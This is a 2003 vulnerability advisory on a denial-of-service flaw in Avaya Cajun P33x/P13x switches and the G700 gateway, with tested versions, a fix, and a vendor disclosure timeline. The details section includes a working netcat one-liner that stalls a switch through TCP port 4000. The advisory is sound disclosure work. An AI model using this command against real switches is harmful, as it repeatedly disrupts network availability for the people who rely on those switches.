1. Problem Description

There exists a denial of service attack in the AVAYA Cajun P33x and P13x
switch family with firmware versions 3.x. It is possible to stop the
switch for 30 seconds. By repeating the attack access can be denied for
arbitrarily long periods of time.

2. Tested systems

The following versions were tested and found vulnerable:

Avaya Cajun P330T software version 3.12.1
Avaya Cajun P333R software version 3.12.0
Avaya Cajun P133 software version 2.6.1

Other versions are are believed to be vulnerable.

Additionally Avaya has found the G700 Media Gateway to be also vulnerable.

3. Details

By connecting to tcp port 4000 on the switch and sending at least five
bytes, of which the first four represent a negative integer will cause the
switch to stall, after some time the switch reboots. Example:

sq5bpf@hash:~$ printf "\x80dupa"|nc -v -v -v -n 192.168.66.3 4000
(UNKNOWN) [192.168.66.3] 4000 (?) open
[the connections stalls]

The time the switch needs to become operational again is about 30 seconds,
after this time the attack can be repeated.

4. Recommendations

As always it is good administrative practice to block unknown traffic to
network devices. Upgrading the switch to version 4.x also seems to fix the
problem.

5. Vendor status

AVAYA was informed on 3 Jun 2003. The vendor responded on 4 Jun 2003. As
the vendor proved responsive and worked promptly on the problem, I have
agreed to release the information after 17 Jun 2003. The fixed software is
avaliable from the Avaya support site http://support.avaya.com. Official
AVAYA security advisories are located at
http://support.avaya.com/security/

6. Disclaimer

Neither I nor my employer is responsible for the use or misuse of
information in this advisory.  The opinions expressed are my own and not
of any company.  Any use of the information is at the user's own risk.


Jacek Lipkowski sq5bpf@andra.com.pl

Andra Co. Ltd.
ul Wynalazek 6
02-677 Warsaw, Poland
http://www.andra.com.pl